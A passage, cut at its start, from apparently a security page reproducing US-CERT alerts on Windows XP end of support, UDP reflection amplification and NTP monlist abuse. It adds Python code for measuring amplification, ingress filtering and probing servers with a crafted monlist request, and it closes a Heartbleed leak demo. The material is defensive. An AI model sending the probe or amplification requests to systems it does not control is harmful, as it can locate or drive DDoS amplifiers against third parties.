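    vuln, fixed = run_heartbeat(claimed_length=0xFFFF)
    print("vulnerable build leaked:", leaked_bytes(vuln, b"hello"))
    print("fixed build replied:", fixed)
```

The two-byte length field is why the leak comes in chunks of up to 64k: 0xFFFF is the largest value a peer can claim per request, and nothing in the vulnerable path limits how often it asks.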
TA14-069A: Microsoft Ending Support for Windows XP and Office 2003
Microsoft is ending support for the Windows XP operating system and Office 2003 product line on April 8, 2014. [1] After this date, these products will no longer receive:

All software products have a lifecycle. End of support refers to the date when Microsoft no longer provides automatic fixes, updates, or online technical assistance. [2] As of February 2014, nearly 30 percent of Internet-connected PCs still run Windows XP. [3] Microsoft will send "End of Support" notifications to users of Windows XP who have elected to receive updates via Windows Update. Users in organizations using Windows Server Update Services (WSUS), System Center Configuration Manager, or Windows Intune will not receive the notification. [4]

Computer systems running unsupported software are exposed to elevated cybersecurity risk, such as malicious attacks or electronic data loss. Users may also encounter problems with software and hardware compatibility, since new software applications and hardware devices may not be built for Windows XP or Office 2003. Organizations that are governed by regulatory obligations may find they are no longer able to satisfy compliance requirements. [4]

Computers operating Windows XP with SP3 or running Office 2003 products will continue to work after support ends. However, using unsupported software may increase the risk of viruses and other security threats. Users have the option to upgrade to a currently supported operating system or office productivity suite. The Microsoft "End of Support" pages for Windows XP and Office 2003 offer additional details. There are software vendors and service providers in the marketplace who offer assistance in migrating from Windows XP or Office 2003 to a currently supported operating system or office productivity suite. US-CERT does not endorse or support any particular product or vendor.
Users who choose to continue using Windows XP after the end of support may mitigate some risks by using a web browser other than Internet Explorer. The Windows XP versions of some alternative browsers will continue to receive support temporarily. Users should consult the support pages of their chosen alternative browser for more details.
TA14-017A: UDP-based Amplification Attacks
Systems affected: Certain UDP protocols have been identified as potential attack vectors:

A Distributed Reflective Denial of Service (DRDoS) attack is an emerging form of Distributed Denial of Service (DDoS) that relies on the use of publicly accessible UDP servers, as well as bandwidth amplification factors, to overwhelm a victim system with UDP traffic.

UDP, by design, is a connection-less protocol that does not validate source IP addresses. Unless the application-layer protocol uses countermeasures such as session initiation, it is very easy to forge the IP datagram to carry an arbitrary source IP address [7]. When many UDP packets have their source IP address forged to a single address, the server responds to that victim, creating a reflected Denial of Service (DoS) attack.

Recently, certain UDP protocols have been found to have particular responses to certain commands that are much larger than the initial request. Where before attackers were limited linearly by the number of packets directly sent to the target to conduct a DoS attack, now a single packet can generate tens or hundreds of times the bandwidth in its response. This is called an amplification attack, and when combined with a reflective DoS attack on a large scale it makes it relatively easy to conduct DDoS attacks.

To measure the potential effect of an amplification attack, we use a metric called the bandwidth amplification factor (BAF). BAF is calculated as the number of UDP payload bytes that an amplifier sends to answer a request, divided by the number of UDP payload bytes of the request [9] [10]. The list of known protocols, and their associated bandwidth amplification factors, is listed below. US-CERT would like to thank Christian Rossow for providing this information. For more information on bandwidth amplification factors, please see Christian's blog and associated research paper.
Attackers can utilize the bandwidth and relative trust of large servers that provide the above UDP protocols to flood victims with unwanted traffic, a DDoS attack. Detection of DRDoS attacks is not easy, due to their use of large, trusted servers that provide UDP services. As a victim, traditional DoS mitigation techniques may apply. As a network operator of one of these exploitable services, look for abnormally large responses to a particular IP address. This may indicate that an attacker is using your service to conduct a DRDoS attack.

Source IP Verification

Because the UDP requests being sent by the attacker-controlled clients must have a source IP address spoofed to appear as the victim's IP, the first step to reducing the effectiveness of UDP amplification is for Internet Service Providers to reject any UDP traffic with spoofed addresses. The Network Working Group of the Internet Engineering Task Force (IETF) released Best Current Practice 38 in May 2000 and Best Current Practice 84 in March 2004, which describe how an Internet Service Provider can filter network traffic on its network to reject packets with source addresses not reachable via the actual packet's path [3][4]. The changes recommended in these documents would cause a routing device to evaluate whether it is possible to reach the source IP address of the packet via the interface on which the packet arrived. If it is not possible, then the packet most likely has a spoofed source IP address. This configuration change would substantially reduce the potential for most popular types of DDoS attacks. As such, we highly recommend that all network operators perform network ingress filtering if possible. Note that it will not explicitly protect a UDP service provider from being exploited in a DRDoS (all network providers must use ingress filtering in order to completely eliminate the threat).
To verify your network has implemented ingress filtering, download the open source tools from the Spoofer Project [5].

Traffic Shaping

Limiting responses to UDP requests is another potential mitigation to this issue. This may require testing to discover the optimal limit that does not interfere with legitimate traffic. The IETF released Request for Comments (RFC) 2475 and RFC 3260, which describe some methods to shape and control traffic [6] [8]. Most network devices today provide these functions in their software.
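The BAF definition, the operator-side detection advice ("look for abnormally large responses to a particular IP address") and the ingress-filtering check from the Source IP Verification section above can all be written down in a few functions. The following is an added example for this page, not from the advisory, the Spoofer Project or any router vendor: the flow records and the routing table are constructed samples, and the thresholds in find_amplification_targets are illustrative values, not recommendations from the page.

```python
"""Bandwidth amplification factor, amplifier-side detection, and a BCP 38 style strict
reverse-path check. Example code for this page; flows, routes and thresholds are constructed."""
import ipaddress
from collections import defaultdict


def bandwidth_amplification_factor(request_payload_bytes, response_payload_bytes):
    """BAF as defined above: UDP payload bytes the amplifier sends back, divided by
    the UDP payload bytes of the request that provoked them."""
    return response_payload_bytes / request_payload_bytes


# Constructed flow records as seen from a UDP service host (198.51.100.1):
# (direction, src_ip, dst_ip, dst_port, udp_payload_bytes, packets).
SAMPLE_FLOWS = [
    ("in", "203.0.113.9", "198.51.100.1", 123, 64, 8),        # 8 requests "from" the victim
    ("out", "198.51.100.1", "203.0.113.9", 123, 35200, 800),  # 100 x 440-byte replies per request
    ("in", "192.0.2.44", "198.51.100.1", 123, 48, 1),         # an ordinary client
    ("out", "198.51.100.1", "192.0.2.44", 123, 48, 1),
]


def find_amplification_targets(flows, min_baf=10.0, min_response_bytes=10000):
    """Operator-side check from the page: peers that receive far more from this service
    than they sent to it are probably spoofed victims. Returns {peer: observed BAF}."""
    bytes_in, bytes_out = defaultdict(int), defaultdict(int)
    for direction, src, dst, _port, nbytes, _packets in flows:
        if direction == "in":
            bytes_in[src] += nbytes
        else:
            bytes_out[dst] += nbytes
    suspects = {}
    for peer, out_bytes in bytes_out.items():
        baf = bandwidth_amplification_factor(max(bytes_in[peer], 1), out_bytes)
        if out_bytes >= min_response_bytes and baf >= min_baf:
            suspects[peer] = round(baf, 1)
    return suspects


# Constructed routing table: (prefix, interface through which the prefix is reached).
SAMPLE_ROUTES = [
    ("192.0.2.0/24", "cust-a"),
    ("198.51.100.0/24", "cust-b"),
    ("0.0.0.0/0", "upstream"),
]


def passes_strict_urpf(routes, ingress_interface, source_ip):
    """Strict reverse-path check in the spirit of BCP 38 / BCP 84: accept the packet only
    if the longest-prefix route back to its source leaves via the interface it arrived on."""
    src = ipaddress.ip_address(source_ip)
    best = None
    for prefix, iface in routes:
        net = ipaddress.ip_network(prefix)
        if src in net and (best is None or net.prefixlen > best[0].prefixlen):
            best = (net, iface)
    return best is not None and best[1] == ingress_interface


def filter_ingress(routes, packets):
    """Apply the check to (ingress_interface, source_ip) pairs; returns the ones to drop."""
    return [(iface, ip) for iface, ip in packets if not passes_strict_urpf(routes, iface, ip)]


if __name__ == "__main__":
    print("abused towards:", find_amplification_targets(SAMPLE_FLOWS))
    print("dropped:", filter_ingress(SAMPLE_ROUTES, [("cust-a", "192.0.2.10"), ("cust-a", "203.0.113.9")]))
```

Strict mode is the right fit at a customer edge, where the routes back to a customer are exactly the interfaces it is attached to; on interfaces with asymmetric routing (the upstream side, multihomed peers) a strict check drops legitimate traffic, which is why BCP 84 also describes loose and feasible-path variants.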
TA14-013A: NTP Amplification Attacks Using CVE-2013-5211
Systems affected: NTP servers

A Network Time Protocol (NTP) amplification attack is an emerging form of Distributed Denial of Service (DDoS) that relies on the use of publicly accessible NTP servers to overwhelm a victim system with UDP traffic.

The NTP service supports a monitoring service that allows administrators to query the server for traffic counts of connected clients. This information is provided via the "monlist" command. The basic attack technique consists of an attacker sending a "get monlist" request to a vulnerable NTP server, with the source address spoofed to be the victim's address. The attack relies on the exploitation of the 'monlist' feature of NTP, as described in CVE-2013-5211, which is enabled by default on older NTP-capable devices. This command causes a list of the last 600 IP addresses which connected to the NTP server to be returned. Due to the spoofed source address, when the NTP server sends the response it is sent to the victim instead. Because the size of the response is typically considerably larger than the request, the attacker is able to amplify the volume of traffic directed at the victim. Additionally, because the responses are legitimate data coming from valid servers, it is especially difficult to block these types of attacks.

The solution is to disable "monlist" within the NTP server or to upgrade to the latest version of NTP (4.2.7), which disables the "monlist" functionality. On a UNIX platform, the command "ntpdc" will query existing NTP servers for monitoring data. If the system is vulnerable to exploitation, it will respond to the "monlist" command in interactive mode. By default, most modern UNIX and Linux distributions allow this command to be used from localhost, but not from a remote host.
To test for monlist support, execute the following command at the command line (the -c option runs a single ntpdc command non-interactively and -n suppresses reverse DNS lookups of the listed addresses):

    ntpdc -n -c monlist <remote server>

Additionally, the "ntp-monlist" script is available for Nmap, which will automatically display the results of the monlist command. If the system does not support the monitor query, and is therefore not vulnerable to this attack type, Nmap will return an error type 4 (No Data Available) or no reply at all.

Recommended Course of Action

As all versions of ntpd prior to 4.2.7 are vulnerable by default, the simplest recommended course of action is to upgrade all versions of ntpd that are publicly accessible to at least 4.2.7. However, in cases where it is not possible to upgrade the version of the service, it is possible to disable the monitor functionality in earlier versions of the software.

To disable "monlist" functionality on a public-facing NTP server that cannot be updated to 4.2.7, add the "noquery" directive to the "restrict default" line in the system's ntp.conf, as shown below:

    restrict default kod nomodify notrap nopeer noquery
    restrict -6 default kod nomodify notrap nopeer noquery

Note that "noquery" blocks all ntpq and ntpdc information queries from hosts matched by that line, not only monlist; time service itself is unaffected, and a separate "restrict 127.0.0.1" line keeps local queries working.
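The same check can be scripted without ntpdc or Nmap, which is useful when scanning a large address range. The following is an added example for this page, not the Nmap script or any ntp.org code: it builds the 8-byte mode 7 MON_GETLIST_1 request, parses the mode 7 reply header so that the "error type 4" outcome the page mentions is reported by name, and collects every reply datagram to show how many bytes an 8-byte request provokes. The header layout follows ntp_request.h; the item size used in the constructed replies is an assumption of this example, since real code should read it from the header as parse_mode7_header does.

```python
"""Build the NTP mode 7 MON_GETLIST_1 request and classify the reply. Example code for this
page, not Nmap's ntp-monlist script. Mode 7 header (ntp_request.h): byte 0 = response|more|
version|mode, byte 1 = auth|sequence, byte 2 = implementation (3 = XNTPD), byte 3 = request
code (42 = MON_GETLIST_1), bytes 4-5 = err(4 bits)|nitems(12 bits), bytes 6-7 = mbz(4)|itemsize(12).
The 72-byte item size in build_mode7_response is assumed for the constructed test replies."""
import socket
import struct

MODE7_VERSION = 2
IMPL_XNTPD = 3
REQ_MON_GETLIST_1 = 42
INFO_ERR_NODATA = 4  # the "error type 4 (No Data Available)" the Nmap script reports


def build_monlist_request():
    """The 8-byte request that gets amplified."""
    first = (MODE7_VERSION << 3) | 7  # response and more bits clear, version 2, mode 7
    return bytes([first, 0x00, IMPL_XNTPD, REQ_MON_GETLIST_1, 0, 0, 0, 0])


def parse_mode7_header(data):
    if len(data) < 8:
        raise ValueError("short mode 7 packet")
    first, _auth_seq, impl, req, err_nitems, mbz_size = struct.unpack("!BBBBHH", data[:8])
    return {
        "response": bool(first & 0x80), "more": bool(first & 0x40),
        "version": (first >> 3) & 0x07, "mode": first & 0x07,
        "implementation": impl, "request_code": req,
        "err": err_nitems >> 12, "nitems": err_nitems & 0x0FFF,
        "itemsize": mbz_size & 0x0FFF,
    }


def build_mode7_response(err, nitems, itemsize=72, more=False):
    """Constructed server reply for testing (not a captured packet)."""
    first = 0x80 | (0x40 if more else 0) | (MODE7_VERSION << 3) | 7
    header = struct.pack("!BBBBHH", first, 0, IMPL_XNTPD, REQ_MON_GETLIST_1, (err << 12) | nitems, itemsize)
    return header + b"\x00" * (nitems * itemsize)


def classify_reply(packets):
    """Map what came back to the outcomes the page describes."""
    if not packets:
        return "no reply (filtered, or noquery in effect)"
    hdr = parse_mode7_header(packets[0])
    if hdr["err"] == INFO_ERR_NODATA:
        return "error 4: no data available (monlist not supported)"
    if hdr["err"] == 0 and hdr["request_code"] == REQ_MON_GETLIST_1:
        total = sum(len(p) for p in packets)
        return "monlist enabled: %d packet(s), %d bytes for an 8-byte request" % (len(packets), total)
    return "mode 7 error %d" % hdr["err"]


def probe_monlist(host, port=123, timeout=2.0):
    """Send one request and collect every reply datagram until the socket goes quiet."""
    packets = []
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(build_monlist_request(), (host, port))
        try:
            while True:
                data, _peer = sock.recvfrom(4096)
                packets.append(data)
        except socket.timeout:
            pass
    return classify_reply(packets)


if __name__ == "__main__":
    import sys
    print(probe_monlist(sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"))
```

Only probe hosts you are responsible for: a server that answers with several full-size reply packets is exactly the amplifier the attack needs, and the byte count classify_reply prints is the observed amplification for that one request.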